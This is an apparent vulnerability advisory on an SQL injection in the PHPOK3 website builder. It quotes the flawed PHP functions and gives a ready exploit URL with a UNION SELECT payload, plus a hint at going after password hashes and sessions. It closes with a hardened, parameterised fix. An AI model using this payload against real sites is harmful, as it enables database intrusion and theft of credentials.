PHPOK3 enterprise website builder injection vulnerability - Vulnerability warning - Black Bar Safety Net

2011-01-11T00:00:00
ID MYHACK58:62201128820
Type myhack58
Reporter Anonymous
Modified 2011-01-11T00:00:00

Description

Author: jsbug
Original: http://lcx.cc/?FoxNews=1077.html

My friends always step over my corpse on their way to going Godlike in DOTA. I saw someone on the forum mention phpok, so, taking advantage of the weekend, here is a free kill for you; I hope you can go Godlike too.

"phpok3/app/www/models/upfile.php":

    // Get image information by ID string; here it fetches the thumbnails for the given IDs
    function piclist($idstring="")
    {
        if(!$idstring)
        {
            return false;
        }
        $sql = "SELECT id,thumb url FROM ".$this->db->prefix."upfiles WHERE id IN(".$idstring.") ORDER BY substring_index('".$idstring."', id,1)";
        echo($sql);
        return $this->db->get_all($sql);
    }

The problem is the IN() clause here, somewhat similar to the "Dz5.0" "pm.php" vulnerability from back then: $idstring is concatenated into the SQL statement as-is.

"phpok3/app/www/control/open.php":

    // Preview pictures via Ajax
    function ajax_preview_img_f()
    {
        // Here it only guards against cross-site scripting and filters bad input
        $idstring = $this->trans_lib->safe("idstring");
        if(!$idstring)
        {
            exit("empty");
        }
        // Passed straight into the query
        $rslist = $this->upfile_m->piclist($idstring);
        sys_html2js($this->json_lib->encode($rslist));
    }

There are a few more of the same type; I will not repeat them here.

Attached Exp: http://localhost/phpok3/index.php?c=open&f=ajax_preview_img&idstring=0) union select 1,version()%23

The password is hashed with MD5 twice; of course, you can also go after the Session directly (I didn't test this, I'm just mentioning it casually).
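A hardened form of the piclist() query, as an added example that is not PHPOK's code or the author's: the ID list is validated as plain integers and every ID is passed as a bound parameter, so the idstring from the request above is rejected before any SQL is built. parse_id_list() and build_piclist_query() are hypothetical names, the "prefix_" table prefix and the sample inputs are constructed, and a PDO-style driver with positional placeholders is assumed.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not part of PHPOK): accept only "1,2,3"-style lists.
// Returns a list of ints, or null if any element is not a plain integer.
function parse_id_list(string $raw, int $max = 100): ?array
{
    $ids = [];
    foreach (explode(',', $raw) as $part) {
        $part = trim($part);
        // ctype_digit rejects '', signs, quotes, parentheses and SQL keywords
        if (!ctype_digit($part) || strlen($part) > 10) {
            return null;
        }
        $ids[] = (int)$part;
    }
    $ids = array_values(array_unique($ids));
    return count($ids) > $max ? null : $ids;
}

// Hypothetical replacement for the string concatenation in piclist():
// IDs are bound parameters, and FIELD() keeps the caller's order (MySQL).
function build_piclist_query(array $ids, string $prefix): array
{
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $sql = "SELECT id, thumb AS url FROM {$prefix}upfiles "
         . "WHERE id IN ($marks) ORDER BY FIELD(id, $marks)";
    return [$sql, array_merge($ids, $ids)];
}

// Constructed inputs; the second is the idstring value from the URL above, decoded.
$samples = ['3,1,2', '0) union select 1,version()#', '1, 2', '', '1;2'];
foreach ($samples as $raw) {
    $ids = parse_id_list($raw);
    if ($ids === null) {
        echo 'REJECT ' . json_encode($raw) . "\n";
        continue;
    }
    [$sql, $params] = build_piclist_query($ids, 'prefix_');
    echo "OK     $sql  params=" . json_encode($params) . "\n";
    // With an assumed PDO connection $pdo:
    //   $st = $pdo->prepare($sql); $st->execute($params);
}
```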